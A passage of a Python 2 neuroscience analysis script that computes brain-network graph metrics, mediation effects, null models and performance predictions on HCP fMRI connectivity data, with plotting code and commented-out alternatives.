sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/pc_mod_regress_mean_%s_lowless.pdf'%(thresh))
sns.plt.close()
def multi_med(data):
outcome_model = sm.OLS.from_formula("q ~ weight + pc", data)
mediator_model = sm.OLS.from_formula("weight ~ pc", data)
med_val = np.mean(Mediation(outcome_model, mediator_model, "pc", "weight").fit(n_rep=10).ACME_avg)
return med_val
def connector_mediation(task):
"""
264,264,264 matrix, which edges mediate the relationship between PC and Q
"""
atlas = 'power'
project='hcp'
known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
subjects = np.load('%s/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %(homedir,'hcp',task,atlas))
static_results = graph_metrics(subjects,task,atlas,run_version='fz')
matrices = static_results['matrices']
subject_pcs = static_results['subject_pcs']
subject_mods = static_results['subject_mods']
mod_pc_corr = np.zeros(subject_pcs.shape[1])
for i in range(subject_pcs.shape[1]):
mod_pc_corr[i] = nan_pearsonr(subject_mods,subject_pcs[:,i])[0]
mean_conn = np.nanmean(matrices,axis=0)
e_tresh = np.percentile(mean_conn,85)
subject_pcs[np.isnan(subject_pcs)] = 0.0
m = np.zeros((264,264,264))
pool = Pool(40)
for n in range(264):
print n
sys.stdout.flush()
variables = []
for i,j in combinations(range(264),2):
variables.append(pd.DataFrame(data={'pc':subject_pcs[:,n],'weight':matrices[:,i,j],'q':subject_mods},index=range(len(subject_pcs))))
results = pool.map(multi_med,variables)
for r,i in zip(results,combinations(range(264),2)):
m[n,i[0],i[1]] = r
m[n,i[1],i[0]] = r
np.save('/home/despoB/mb3152/dynamic_mod/results/full_med_matrix_new_%s.npy'%(task),m)
def local_mediation(task):
"""
264,264,264 matrix, which edges mediate the relationship between WMD and Q
"""
atlas = 'power'
project='hcp'
known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
subjects = np.load('%s/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %(homedir,'hcp',task,atlas))
static_results = graph_metrics(subjects,task,atlas,run_version='fz')
matrices = static_results['matrices']
subject_pcs = static_results['subject_pcs']
subject_wmds = static_results['subject_wmds']
subject_mods = static_results['subject_mods']
mod_wmd_corr = np.zeros(subject_wmds.shape[1])
for i in range(subject_pcs.shape[1]):
mod_wmd_corr[i] = nan_pearsonr(subject_mods,subject_wmds[:,i])[0]
mean_conn = np.nanmean(matrices,axis=0)
e_tresh = np.percentile(mean_conn,85)
subject_wmds[np.isnan(subject_pcs)] = 0.0
m = np.zeros((264,264,264))
pool = Pool(40)
for n in range(264):
print n
sys.stdout.flush()
variables = []
for i,j in combinations(range(264),2):
variables.append(pd.DataFrame(data={'pc':subject_wmds[:,n],'weight':matrices[:,i,j],'q':subject_mods},index=range(len(subject_pcs))))
results = pool.map(multi_med,variables)
for r,i in zip(results,combinations(range(264),2)):
m[n,i[0],i[1]] = r
m[n,i[1],i[0]] = r
np.save('/home/despoB/mb3152/dynamic_mod/results/full_med_matrix_new_%s_wmds.npy'%(task),m)
def local_versus_connector_mediation(task):
locality_df = pd.DataFrame()
for task in ['REST','WM','GAMBLING','SOCIAL','RELATIONAL','MOTOR','LANGUAGE']:
atlas = 'power'
project='hcp'
known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
subjects = np.load('%s/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %(homedir,'hcp',task,atlas))
static_results = graph_metrics(subjects,task,atlas,run_version='fz')
matrices = static_results['matrices']
subject_pcs = static_results['subject_pcs']
subject_wmds = static_results['subject_wmds']
subject_mods = static_results['subject_mods']
mod_wmd_corr = np.zeros(subject_wmds.shape[1])
for i in range(subject_pcs.shape[1]):
mod_wmd_corr[i] = nan_pearsonr(subject_mods,subject_wmds[:,i])[0]
mod_pc_corr = np.zeros(subject_wmds.shape[1])
for i in range(subject_pcs.shape[1]):
mod_pc_corr[i] = nan_pearsonr(subject_mods,subject_pcs[:,i])[0]
mean_conn = np.nanmean(matrices,axis=0)
e_tresh = np.percentile(mean_conn,85)
local = np.load('%s/dynamic_mod/results/full_med_matrix_new_%s_wmds.npy'%(homedir,task))
connector = np.load('%s/dynamic_mod/results/full_med_matrix_new_%s.npy'%(homedir,task))
local = np.abs(local)
connector = np.abs(connector)
for i in range(264):
if i in np.arange(264)[np.where(mod_wmd_corr>0.0)]:
real_t = scipy.stats.ttest_ind(local[i][np.argwhere(mean_conn[i]>e_tresh)][:,:,np.arange(264)!=i].reshape(-1),local[i][np.argwhere(mean_conn[i]<e_tresh)][:,:,np.arange(264)!=i].reshape(-1))[0]
locality_df = locality_df.append({"Node Type":'Local Hub','t':real_t},ignore_index=True)
if i in np.arange(264)[np.where(mod_pc_corr>0.0)]:
real_t = scipy.stats.ttest_ind(connector[i][np.argwhere(mean_conn[i]>e_tresh)][:,:,np.arange(264)!=i].reshape(-1),connector[i][np.argwhere(mean_conn[i]<e_tresh)][:,:,np.arange(264)!=i].reshape(-1))[0]
locality_df = locality_df.append({"Node Type":'Connector Hub','t':real_t},ignore_index=True)
locality_df.dropna(inplace=True)
stat = tstatfunc(locality_df.t[locality_df["Node Type"]=='Connector Hub'],locality_df.t[locality_df["Node Type"]=='Local Hub'])
print stat
def sm_null():
try:
r = np.load('/home/despoB/mb3152/dynamic_mod/results/null_sw_results.npy')
except:
sw_rs = []
sw_crs = []
for i in range(100):
print i
pc = []
mod = []
wmd = []
memlen = []
for s in range(100):
graph = Graph.Watts_Strogatz(1,264,7,.25)
graph.es["weight"] = np.ones(graph.ecount())
graph = graph.community_infomap()
graph = brain_graphs.brain_graph(graph)
pc.append(np.array(graph.pc))
wmd.append(np.array(graph.wmd))
mod.append(graph.community.modularity)
memlen.append(len(graph.community.sizes()))
pc = np.array(pc)
mod = np.array(mod)
wmd = np.array(wmd)
memlen = np.array(memlen)
mod_pc_corr = np.zeros(264)
for i in range(264):
mod_pc_corr[i] = nan_pearsonr(mod,pc[:,i])[0]
print pearsonr(np.nanmean(pc,axis=0),mod_pc_corr)[0]
print pearsonr(mod,memlen)[0]
sw_rs.append(pearsonr(np.nanmean(pc,axis=0),mod_pc_corr)[0])
sw_crs.append(pearsonr(mod,memlen)[0])
r = np.array([sw_rs,sw_crs])
np.save('/home/despoB/mb3152/dynamic_mod/results/null_sw_results.npy',r)
return r
def null():
sm_null_results = sm_null()[0]
atlas = 'power'
project='hcp'
task = 'REST'
known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',task,atlas))
static_results = graph_metrics(subjects,task,atlas,'fz')
subject_pcs = static_results['subject_pcs']
subject_wmds = static_results['subject_wmds']
subject_mods = static_results['subject_mods']
subject_wmds = static_results['subject_wmds']
matrices = static_results['matrices']
try:
null_graph_rs,null_community_rs,null_all_rs = np.load('/home/despoB/mb3152/dynamic_mod/results/null_results.npy')
real_df = pd.read_csv('/home/despoB/mb3152/dynamic_mod/results/real_real_results.csv')
except:
1/0
null_graph_rs = []
null_community_rs = []
null_all_rs = []
for i in range(100):
pool = Pool(40)
n_g = pool.map(null_graph_individual_graph_analyes,matrices)
n_c = pool.map(null_community_individual_graph_analyes,matrices)
n_a = pool.map(null_all_individual_graph_analyes,matrices)
"""
null graph
"""
n_g_subject_pcs = []
n_g_subject_wmds = []
n_g_subject_mods = []
for mod,pc,wmd in n_g:
n_g_subject_mods.append(mod)
n_g_subject_pcs.append(pc)
n_g_subject_wmds.append(wmd)
n_g_subject_pcs = np.array(n_g_subject_pcs)
n_g_subject_wmds = np.array(n_g_subject_wmds)
n_g_subject_mods = np.array(n_g_subject_mods)
mean_pc = np.nanmean(n_g_subject_pcs,axis=0)
mean_wmd = np.nanmean(n_g_subject_wmds,axis=0)
n_g_mod_pc_corr = np.zeros(n_g_subject_pcs.shape[1])
for i in range(n_g_subject_pcs.shape[1]):
n_g_mod_pc_corr[i] = nan_pearsonr(n_g_subject_mods,n_g_subject_pcs[:,i])[0]
n_g_mod_wmd_corr = np.zeros(n_g_subject_wmds.shape[1])
for i in range(n_g_subject_wmds.shape[1]):
n_g_mod_wmd_corr[i] = nan_pearsonr(n_g_subject_mods,n_g_subject_wmds[:,i])[0]
print 'Pearson R, PC & Q, Mean PC: ', nan_pearsonr(n_g_mod_pc_corr,mean_pc)
null_graph_rs.append(nan_pearsonr(n_g_mod_pc_corr,mean_pc)[0])
# print 'Pearson R, PC & WCD, Mean WMD: ', nan_pearsonr(n_g_mod_wmd_corr,mean_wmd)
n_c_subject_pcs = []
n_c_subject_wmds = []
n_c_subject_mods = []
for mod,pc,wmd in n_c:
n_c_subject_mods.append(mod)
n_c_subject_pcs.append(pc)
n_c_subject_wmds.append(wmd)
n_c_subject_pcs = np.array(n_c_subject_pcs)
n_c_subject_wmds = np.array(n_c_subject_wmds)
n_c_subject_mods = np.array(n_c_subject_mods)
mean_pc = np.nanmean(n_c_subject_pcs,axis=0)
mean_wmd = np.nanmean(n_c_subject_wmds,axis=0)
n_c_mod_pc_corr = np.zeros(n_c_subject_pcs.shape[1])
for i in range(n_c_subject_pcs.shape[1]):
n_c_mod_pc_corr[i] = nan_pearsonr(n_c_subject_mods,n_c_subject_pcs[:,i])[0]
n_c_mod_wmd_corr = np.zeros(n_c_subject_wmds.shape[1])
for i in range(n_c_subject_wmds.shape[1]):
n_c_mod_wmd_corr[i] = nan_pearsonr(n_c_subject_mods,n_c_subject_wmds[:,i])[0]
print 'Pearson R, PC & Q, Mean PC: ', nan_pearsonr(n_c_mod_pc_corr,mean_pc)
null_community_rs.append(nan_pearsonr(n_c_mod_pc_corr,mean_pc)[0])
# print 'Pearson R, PC & WCD, Mean WMD: ', nan_pearsonr(mod_wmd_corr,mean_wmd)
n_a_subject_pcs = []
n_a_subject_wmds = []
n_a_subject_mods = []
for mod,pc,wmd in n_a:
n_a_subject_mods.append(mod)
n_a_subject_pcs.append(pc)
n_a_subject_wmds.append(wmd)
n_a_subject_pcs = np.array(n_a_subject_pcs)
n_a_subject_wmds = np.array(n_a_subject_wmds)
n_a_subject_mods = np.array(n_a_subject_mods)
mean_pc = np.nanmean(n_a_subject_pcs,axis=0)
mean_wmd = np.nanmean(n_a_subject_wmds,axis=0)
n_a_mod_pc_corr = np.zeros(n_a_subject_pcs.shape[1])
for i in range(n_a_subject_pcs.shape[1]):
n_a_mod_pc_corr[i] = nan_pearsonr(n_a_subject_mods,n_a_subject_pcs[:,i])[0]
n_a_mod_wmd_corr = np.zeros(n_a_subject_wmds.shape[1])
for i in range(n_a_subject_wmds.shape[1]):
n_a_mod_wmd_corr[i] = nan_pearsonr(n_a_subject_mods,n_a_subject_wmds[:,i])[0]
print 'Pearson R, PC & Q, Mean PC: ', nan_pearsonr(n_a_mod_pc_corr,mean_pc)
null_all_rs.append(nan_pearsonr(n_a_mod_pc_corr,mean_pc)[0])
# print 'Pearson R, PC & WCD, Mean WMD: ', nan_pearsonr(mod_n_a_wmd_corr,mean_wmd)
results = np.array([null_graph_rs,null_community_rs,null_all_rs])
np.save('/home/despoB/mb3152/dynamic_mod/results/null_results.npy',results)
real_df = connectivity_across_tasks(atlas='power',project='hcp',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz_wc',control_com=False,control_motion=False)
real_df.to_csv('/home/despoB/mb3152/dynamic_mod/results/real_real_results.csv')
df = pd.DataFrame(columns=['R','Null Model Type'])
for r in null_graph_rs:
df = df.append({'R':r,'Null Model Type':'Random Edges, Real Community'},ignore_index=True)
for r in null_community_rs:
df = df.append({'R':r,'Null Model Type':'Random Community, Real Edges'},ignore_index=True)
for r in null_all_rs:
df = df.append({'R':r,'Null Model Type':'Random Edges, Clustered'},ignore_index=True)
for r in sm_null_results:
df = df.append({'R':r,'Null Model Type':'Wattz-Strogatz'},ignore_index=True)
for r in real_df.Result:
r = float(r.split(',')[0])
df = df.append({'R':r,'Null Model Type':'Real Edges, Real Community'},ignore_index=True)
f = sns.plt.figure(figsize=(18,8))
sns.set_style("white")
sns.set_style("ticks")
sns.set(context="paper",font='Helvetica',font_scale=1.75)
sns.violinplot(x="Null Model Type", y="R", data=df,inner='quartile')
sns.plt.ylabel("R Values Between Nodes' Mean Participation Coefficients\n and the R values of Participation Coefficients and Qs")
sns.plt.tight_layout()
sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/null_models.pdf')
def specificity():
"""
Specificity of modulation by nodes' PC.
Does the PC value of i impact the connectivity of j as i and j are more strongly connected?
"""
atlas = 'power'
project='hcp'
df_columns=['Task','Hub Measure','Q+/Q-','Average Edge i-j Weight',"Strength of r's, i's PC & j's Q"]
tasks = ['REST','WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL',]
known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
df = pd.DataFrame(columns = df_columns)
for task in tasks:
print task
# subjects = np.array(hcp_subjects).copy()
# subjects = list(subjects)
# subjects = remove_missing_subjects(subjects,task,atlas)
subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',task,atlas))
static_results = graph_metrics(subjects,task,atlas,'fz')
subject_pcs = static_results['subject_pcs']
subject_wmds = static_results['subject_wmds']
subject_mods = static_results['subject_mods']
subject_wmds = static_results['subject_wmds']
matrices = static_results['matrices']
#sum of weight changes for each node, by each node.
hub_nodes = ['WCD']
# hub_nodes = ['PC']
driver_nodes_list = ['Q+','Q-']
# driver_nodes_list = ['Q+']
mean_pc = np.nanmean(subject_pcs,axis=0)
mean_wmd = np.nanmean(subject_wmds,axis=0)
mod_pc_corr = np.zeros(subject_pcs.shape[1])
for i in range(subject_pcs.shape[1]):
mod_pc_corr[i] = nan_pearsonr(subject_mods,subject_pcs[:,i])[0]
mod_wmd_corr = np.zeros(subject_wmds.shape[1])
for i in range(subject_wmds.shape[1]):
mod_wmd_corr[i] = nan_pearsonr(subject_mods,subject_wmds[:,i])[0]
for hub_node in hub_nodes:
if hub_node == 'PC':
pc_edge_corr = np.arctanh(pc_edge_correlation(subject_pcs,matrices,path='/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_pc_edge_corr_z.npy' %(project,task,atlas)))
connector_nodes = np.where(mod_pc_corr>0.0)[0]
local_nodes = np.where(mod_pc_corr<0.0)[0]
else:
pc_edge_corr = np.arctanh(pc_edge_correlation(subject_wmds,matrices,path='/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_wmd_edge_corr_z.npy' %(project,task,atlas)))
connector_nodes = np.where(mod_wmd_corr>0.0)[0]
local_nodes = np.where(mod_wmd_corr<0.0)[0]
edge_thresh_val = 50.0
edge_thresh = np.percentile(np.nanmean(matrices,axis=0),edge_thresh_val)
pc_edge_corr[:,np.nanmean(matrices,axis=0)<edge_thresh] = np.nan
for driver_nodes in driver_nodes_list:
weight_change_matrix_between = np.zeros((num_nodes,num_nodes))
weight_change_matrix_within = np.zeros((num_nodes,num_nodes))
if driver_nodes == 'Q-':
driver_nodes_array = local_nodes
else:
driver_nodes_array = connector_nodes
for n1,n2 in permutations(range(num_nodes),2):
if n1 not in driver_nodes_array:
continue
if known_membership[n2] == 0:
continue
array = pc_edge_corr[n1][n2]
weight_change_matrix_between[n1,n2] = np.nansum(pc_edge_corr[n1][n2][np.where((known_membership!=known_membership[n2])&(np.arange(264)!=n1))])
weight_change_matrix_within[n1,n2] = np.nansum(pc_edge_corr[n1][n2][np.where((known_membership==known_membership[n2])&(np.arange(264)!=n1))])
# for n3 in range(264):
# if n1 == n3:
# continue
# if known_membership[n3]!= known_membership[n2]:
# weight_change_matrix_between[n1,n2] = np.nansum([weight_change_matrix_between[n1,n2],array[n3]])
# between_len = between_len + 1
# else:
# weight_change_matrix_within[n1,n2] = np.nansum([weight_change_matrix_within[n1,n2],array[n3]])
# community_len = community_len + 1
# weight_change_matrix_within[n1,n2] = weight_change_matrix_within[n1,n2] / community_len
# weight_change_matrix_between[n1,n2] = weight_change_matrix_between[n1,n2] / between_len
temp_matrix = np.nanmean(matrices,axis=0)
weight_matrix = weight_change_matrix_within-weight_change_matrix_between
weight_matrix[np.isnan(weight_matrix)] = 0.0
if hub_node == 'PC':
df_columns=['Task','Hub Measure','Q+/Q-','Average Edge i-j Weight',"Strength of r's, i's PC & j's Q"]
else:
df_columns=['Task','Hub Measure','Q+/Q-','Average Edge i-j Weight',"Strength of r's, i's WCD & j's Q"]
df_array = []
for i,j in zip(temp_matrix[weight_matrix!=0.0].reshape(-1),weight_matrix[weight_matrix!=0.0].reshape(-1)):
df_array.append([task,hub_node,driver_nodes,i,j])
df = pd.concat([df,pd.DataFrame(df_array,columns=df_columns)],axis=0)
print hub_node, driver_nodes
print pearsonr(weight_matrix[weight_matrix!=0.0].reshape(-1),temp_matrix[weight_matrix!=0.0].reshape(-1))
1/0
# plot_connectivity_results(df[(df['Q+/Q-']=='Q+') &(df['Hub Measure']=='PC')],"Strength of r's, i's PC & j's Q",'Average Edge i-j Weight','/home/despoB/mb3152/dynamic_mod/figures/edge_spec_pcqplus_%s.pdf'%(edge_thresh_val))
# plot_connectivity_results(df[(df['Q+/Q-']=='Q-') &(df['Hub Measure']=='PC')],"Strength of r's, i's PC & j's Q",'Average Edge i-j Weight','/home/despoB/mb3152/dynamic_mod/figures/edge_spec_pcqminus_%s.pdf'%(edge_thresh_val))
# plot_connectivity_results(df[(df['Q+/Q-']=='Q+') &(df['Hub Measure']=='WCD')],"Strength of r's, i's WCD & j's Q",'Average Edge i-j Weight','/home/despoB/mb3152/dynamic_mod/figures/edge_spec_wmdqplus_%s.pdf'%(edge_thresh_val))
# plot_connectivity_results(df[(df['Q+/Q-']=='Q-') &(df['Hub Measure']=='WCD')],"Strength of r's, i's WCD & j's Q",'Average Edge i-j Weight','/home/despoB/mb3152/dynamic_mod/figures/edge_spec_wmdqminus_%s.pdf'%(edge_thresh_val))
# """
# Are connector nodes modulating the edges that are most variable across subjects?
# """
# atlas='power'
# known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
# for task in tasks:
# pc_thresh = 75
# local_thresh = 25
# subjects = np.array(hcp_subjects).copy()
# subjects = list(subjects)
# subjects = remove_missing_subjects(subjects,task,atlas)
# static_results = graph_metrics(subjects,task,atlas)
# subject_pcs = static_results['subject_pcs']
# subject_wmds = static_results['subject_wmds']
# matrices = static_results['matrices']
# matrices[:,np.nanmean(matrices,axis=0)<0.0] = np.nan
# pc_edge_corr = np.arctanh(pc_edge_correlation(subject_wmds,matrices,path='/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_wmd_edge_corr_z.npy' %(project,task,atlas)))
# # pc_edge_corr = pc_edge_correlation(subject_pcs,matrices,path='/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_pc_edge_corr_z.npy' %(project,task,atlas))
# std_mod = []
# tstd = np.std(matrices,axis=0).reshape(-1)
# for i in range(num_nodes):
# std_mod.append(nan_pearsonr(pc_edge_corr[i].reshape(-1),tstd)[0])
# # print task, pearsonr(np.nanmean(subject_pcs,axis=0),std_mod)
# print task, pearsonr(np.nanmean(subject_wmds,axis=0),std_mod)
# plot_corr_matrix(np.std(matrices,axis=0),network_names.copy(),out_file=None,plot_corr=True,return_array=False)
def get_power_partition(atlas):
return np.array(pd.read_csv('/home/despoB/mb3152/modularity/Consensus264.csv',header=None)[31].values)
def predict(v):
pvals = v[0]
t = v[1]
task_perf = v[2]
train = np.ones(len(pvals)).astype(bool)
train[t] = False
clf = linear_model.LinearRegression(fit_intercept=True)
clf.fit(pvals[train],task_perf[train])
return clf.predict(pvals[t])
def sm_predict(v):
pvals = v[0]
t = v[1]
task_perf = v[2]
train = np.ones(len(pvals)).astype(bool)
train[t] = False
pvals = sm.add_constant(pvals)
r_perf = sm.GLM(task_perf[train],pvals[train]).fit()
return
def corrfunc(x, y, **kws):
r, _ = pearsonr(x, y)
ax = plt.gca()
ax.annotate("r={:.3f}".format(r) + ",p={:.3f}".format(_),xy=(.1, .9), xycoords=ax.transAxes)
def tstatfunc(x, y,bc=False):
t, p = scipy.stats.ttest_ind(x,y)
if bc != False:
bfc = np.around((p * bc),5)
if bfc <= 0.05:
return "t=%s,p=%s,bf=%s" %(np.around(t,3),np.around(p,5),bfc)
else:
return "t=%s" %(np.around(t,3))
return "t=%s,p=%s" %(np.around(t,3),np.around(p,5))
def plot_connectivity_results(data,x,y,save_str):
sns.set_style("white")
sns.set_style("ticks")
colors = sns.palettes.color_palette('Paired',7)
colors = np.array(colors)
sns.set(context="paper",font='Helvetica',style="white",font_scale=1.5)
with sns.plotting_context("paper",font_scale=1):
g = sns.FacetGrid(data,col='Task',hue='Task',sharex=False,sharey=False,palette=colors,col_wrap=4)
g = g.map(sns.regplot,x,y,scatter_kws={'alpha':.50})
g.map(corrfunc,x,y)
sns.despine()
plt.tight_layout()
plt.savefig(save_str,dpi=3600)
plt.close()
def plot_results(data,x,y,save_str):
sns.set(context="paper",font='Helvetica',style="white",font_scale=1.5)
colors = np.array(sns.palettes.color_palette('Paired',6))
with sns.plotting_context("paper",font_scale=1):
g = sns.FacetGrid(data, col='Task', hue='Task',sharex=False,sharey=False,palette=colors[[0,2,4,5]],col_wrap=2)
g = g.map(sns.regplot,x,y,scatter_kws={'alpha':.95})
g.map(corrfunc,x,y)
sns.despine()
plt.tight_layout()
plt.savefig(save_str,dpi=3600)
plt.close()
def supplemental():
# print 'performance original'
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False).to_csv('/home/despoB/mb3152/dynamic_mod/results/performance_orig.csv')
# print 'performance scrubbed'
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='scrub_.2',control_com=False,control_motion=False).to_csv('/home/despoB/mb3152/dynamic_mod/results/performance_scrubbed.csv')
print 'performance motion control'
performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=True).to_csv('/home/despoB/mb3152/dynamic_mod/results/performance_motion_controlled.csv')
# print 'performance community control'
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=True,control_motion=False).to_csv('/home/despoB/mb3152/dynamic_mod/results/performance_community_controlled.csv')
# print 'correlations original'
# motion_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz',control_com=False,control_motion=False).to_csv('/home/despoB/mb3152/dynamic_mod/results/correlations_original.csv')
# print 'correlations scrubbed'
# motion_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='scrub_.2',control_com=False,control_motion=False).to_csv('/home/despoB/mb3152/dynamic_mod/results/correlations_scrubbed.csv')
print 'correlations motion control'
connectivity_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz',control_com=False,control_motion=True).to_csv('/home/despoB/mb3152/dynamic_mod/results/correlations_motion_controlled.csv')
# print 'correlations community control'
# motion_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz',control_com=True,control_motion=False).to_csv('/home/despoB/mb3152/dynamic_mod/results/correlations_community_controlled.csv')
def print_supplemental():
print 'performance original'
performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False)
print 'performance scrubbed'
performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='scrub_.2',control_com=False,control_motion=False)
print 'performance motion control'
performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=True)
print 'performance community control'
performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=True,control_motion=False)
print 'correlations original'
motion_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz',control_com=False,control_motion=False)
print 'correlations scrubbed'
motion_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='scrub_.2',control_com=False,control_motion=False)
print 'correlations motion control'
motion_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz',control_com=False,control_motion=True)
print 'correlations community control'
motion_across_tasks(atlas='power',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz',control_com=True,control_motion=False)
def generate_correlation_map(x, y):
"""
Correlate each n with each m.
----------
Parameters
x : np.array, shape N X T.
y : np.array, shape M X T.
Returns: np.array, N X M array in which each element is a correlation coefficient.
----------
"""
mu_x = x.mean(1)
mu_y = y.mean(1)
n = x.shape[1]
if n != y.shape[1]:
raise ValueError('x and y must ' +
'have the same number of timepoints.')
s_x = x.std(1, ddof=n - 1)
s_y = y.std(1, ddof=n - 1)
cov = np.dot(x,
y.T) - n * np.dot(mu_x[:, np.newaxis],
mu_y[np.newaxis, :])
return cov / np.dot(s_x[:, np.newaxis], s_y[np.newaxis, :])
def super_edge_predict_new(v):
subject_pcs = v[0]
subject_wmds = v[1]
subject_mods = v[2]
rest_subject_pcs = v[3]
rest_subject_wmds = v[4]
rest_subject_mods = v[5]
task_perf = v[6]
t = v[7]
task_matrices = v[8]
rest_matrices = v[9]
return_features = v[10]
use_matrix = v[11]
fit_mask = np.ones((subject_pcs.shape[0])).astype(bool)
fit_mask[t] = False
if use_matrix == True:
flat_matrices = np.zeros((subject_pcs.shape[0],len(np.tril_indices(264,-1)[0])))
for s in range(subject_pcs.shape[0]):
m = task_matrices[s]
flat_matrices[s] = m[np.tril_indices(264,-1)]
perf_edge_corr = generate_correlation_map(task_perf[fit_mask].reshape(1,-1),flat_matrices[fit_mask].transpose())[0]
perf_edge_scores = np.zeros((subject_pcs.shape[0]))
for s in range(subject_pcs.shape[0]):
perf_edge_scores[s] = pearsonr(flat_matrices[s],perf_edge_corr)[0]
flat_matrices = np.zeros((subject_pcs.shape[0],len(np.tril_indices(264,-1)[0])))
for s in range(subject_pcs.shape[0]):
m = rest_matrices[s]
flat_matrices[s] = m[np.tril_indices(264,-1)]
rest_perf_edge_corr = generate_correlation_map(task_perf[fit_mask].reshape(1,-1),flat_matrices[fit_mask].transpose())[0]
rest_perf_edge_scores = np.zeros((subject_pcs.shape[0]))
for s in range(subject_pcs.shape[0]):
rest_perf_edge_scores[s] = pearsonr(flat_matrices[s],rest_perf_edge_corr)[0]
perf_pc_corr = np.zeros(subject_pcs.shape[1])
for i in range(subject_pcs.shape[1]):
perf_pc_corr[i] = nan_pearsonr(task_perf[fit_mask],subject_pcs[fit_mask,i])[0]
perf_wmd_corr = np.zeros(subject_wmds.shape[1])
for i in range(subject_wmds.shape[1]):
perf_wmd_corr[i] = nan_pearsonr(task_perf[fit_mask],subject_wmds[fit_mask,i])[0]
mod_pc_corr = np.zeros(subject_pcs.shape[1])
for i in range(subject_pcs.shape[1]):
mod_pc_corr[i] = nan_pearsonr(task_perf[fit_mask],rest_subject_pcs[fit_mask,i])[0]
mod_wmd_corr = np.zeros(subject_wmds.shape[1])
for i in range(subject_wmds.shape[1]):
mod_wmd_corr[i] = nan_pearsonr(task_perf[fit_mask],rest_subject_wmds[fit_mask,i])[0]
task_pc = np.zeros(subject_pcs.shape[0])
task_wmd = np.zeros(subject_pcs.shape[0])
for s in range(subject_pcs.shape[0]):
task_pc[s] = nan_pearsonr(subject_pcs[s],perf_pc_corr)[0]
task_wmd[s] = nan_pearsonr(subject_wmds[s],perf_wmd_corr)[0]
rest_pc = np.zeros(subject_pcs.shape[0])
rest_wmd = np.zeros(subject_pcs.shape[0])
for s in range(subject_pcs.shape[0]):
rest_pc[s] = nan_pearsonr(rest_subject_pcs[s],mod_pc_corr)[0]
rest_wmd[s] = nan_pearsonr(rest_subject_wmds[s],mod_wmd_corr)[0]
if use_matrix == True:
pvals = np.array([rest_pc,rest_wmd,task_pc,task_wmd,rest_perf_edge_scores,perf_edge_scores,rest_subject_mods,subject_mods]).transpose()
# neurons = (8,8,8,)
neurons = (8,12,8,12)
elif use_matrix == False:
pvals = np.array([rest_pc,rest_wmd,task_pc,task_wmd,rest_subject_mods,subject_mods]).transpose()
# neurons = (6,6,6,)
neurons = (6,9,6,9)
train = np.ones(len(pvals)).astype(bool)
train[t] = False
model = MLPRegressor(solver='lbfgs',hidden_layer_sizes=neurons,alpha=1e-5,random_state=t)
model.fit(pvals[train],task_perf[train])
result = model.predict(pvals[t].reshape(1, -1))[0]
if return_features == True:
return pvals[t],result
return result
def super_edge_predict(v):
subject_pcs = v[0]
subject_wmds = v[1]
subject_mods = v[2]
rest_subject_pcs = v[3]
rest_subject_wmds = v[4]
rest_subject_mods = v[5]
task_perf = v[6]
t = v[7]
neurons = v[8]
task_matrices = v[9]
rest_matrices = v[10]
return_features = v[11]
use_matrix = v[12]
fit_mask = np.ones((subject_pcs.shape[0])).astype(bool)
fit_mask[t] = False
flat_matrices = np.zeros((subject_pcs.shape[0],len(np.tril_indices(264,-1)[0])))
for s in range(subject_pcs.shape[0]):
m = task_matrices[s]
flat_matrices[s] = m[np.tril_indices(264,-1)]
perf_edge_corr = generate_correlation_map(task_perf[fit_mask].reshape(1,-1),flat_matrices[fit_mask].transpose())[0]
perf_edge_scores = np.zeros((subject_pcs.shape[0]))
